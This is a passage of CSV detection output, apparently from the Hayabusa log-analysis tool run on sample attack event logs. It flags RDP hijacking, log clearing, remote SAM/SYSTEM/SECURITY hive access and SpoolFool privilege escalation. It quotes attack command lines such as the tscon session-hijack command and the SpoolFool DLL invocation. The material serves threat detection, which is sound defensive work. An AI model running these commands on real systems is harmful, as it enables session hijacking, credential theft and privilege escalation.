Path: cmd.exe /k tscon 2 /dest rdp-tcp#14 | User: user | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1945c67,rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx +2022-02-08 20:33:15.159 +00:00,wef.windomain.local,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx +2022-02-08 20:33:15.159 +00:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx +2022-02-08 20:33:15.166 +00:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\tscon.exe | PID: 0x1b8c | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx +2022-02-16 10:37:07.251 +00:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: jbrown,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:19.637 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: 02694W-WIN10$ | Computer: - | IP Addr: 172.16.66.25 | LID: 0x567343,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.450 +00:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.450 +00:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567515,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.450 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: samir | Computer: 02694W-WIN10 | IP Addr: 172.16.66.25 | LID: 0x567515,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.520 +00:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.521 +00:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567758,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.534 +00:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.534 +00:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.534 +00:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.550 +00:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.550 +00:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.550 +00:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.934 +00:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.934 +00:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.934 +00:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-19 17:35:16.207 +00:00,DESKTOP-TTEQ6PR,1,info,,Process Created,"Cmd: ""C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe"" -dll C:\ProgramData\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | User: DESKTOP-TTEQ6PR\win10 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -noexit -command Set-Location -literalPath 'C:\Users\win10\Desktop\SpoolFool-main' | LID: 0x277ef | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx +2022-02-19 17:35:16.207 +00:00,DESKTOP-TTEQ6PR,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx +2022-02-19 17:35:16.301 +00:00,DESKTOP-TTEQ6PR,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\4\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx +2022-02-19 17:35:16.328 +00:00,DESKTOP-TTEQ6PR,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,rules/sigma/image_load/image_load_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx